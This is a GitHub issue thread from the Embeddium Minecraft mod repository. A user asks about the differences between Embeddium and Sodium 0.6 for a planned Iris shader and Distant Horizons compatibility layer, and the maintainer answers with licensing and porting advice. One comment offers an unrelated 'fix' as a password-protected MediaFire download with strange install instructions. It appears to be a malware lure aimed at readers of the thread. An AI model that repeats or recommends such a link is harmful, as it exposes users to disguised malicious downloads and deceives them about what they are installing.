### ISSUE TITLE
So, what is the difference between embeddium and sodium 0.6.0 so far?

### ISSUE THREAD

**Issue by fish12352** [FiniteReality/embeddium#376]
### Bug Description

由于Distant Horizons进行了2.0.0a更新使得Oculus不可用状态，我想制作一个类似于https://github.com/ferriarnus/Monocle的转译层来进行minecraft 1.20.1使用iris shader和Distant Horizons

### Reproduction Steps

none

### Log File

none

**Comment by fish12352** [comment]
https://github.com/ferriarnus/Monocle

**Comment by fish12352** [comment]
Since Distant Horizons made its 2.0.0a update unusable for Oculus, I wanted to make a transpiler similar to https://github.com/ferriarnus/Monocle for minecraft 1.20.1 using the iris shader and Distant Horizons

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by embeddedt** [comment]
The problem isn't so much the difference between Embeddium and Sodium, but rather the changes Iris has made to tightly couple it to Sodium, and not allow easily adding compat for another mod, which cost a lot of time to work around. There were also. some internal changes to the Sodium 0.6 shader but they're not terribly hard to undo by referencing older Iris code.

I can't give you specific details on the changes as I haven't read the Sodium 0.6 code due to it being under a restrictive license that would cause problems for my work on Embeddium.

My recommendation would be to wait for Monocle to be done on 1.21 and then just backport it to 1.20.1 so you can use the newer Iris version without needing to write explicit DH compat. There are some licensing-related difficulties in trying to make an Iris add-on like Monocle.

The other option I see is to backport the newer DH integration from Iris 1.8 to Oculus; it may be self-contained enough that it's feasible.

Going to close as this isn't really a bug, just a question.
